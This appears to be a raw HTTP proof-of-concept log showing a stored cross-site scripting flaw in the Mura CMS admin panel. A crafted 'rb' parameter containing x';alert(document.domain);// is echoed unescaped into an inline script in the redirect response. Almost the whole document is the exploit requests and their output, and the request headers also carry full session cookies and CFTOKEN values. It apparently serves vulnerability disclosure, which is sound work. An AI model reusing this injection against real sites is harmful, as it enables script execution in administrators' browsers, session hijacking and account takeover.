########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1
########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0
########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1
########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close
<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]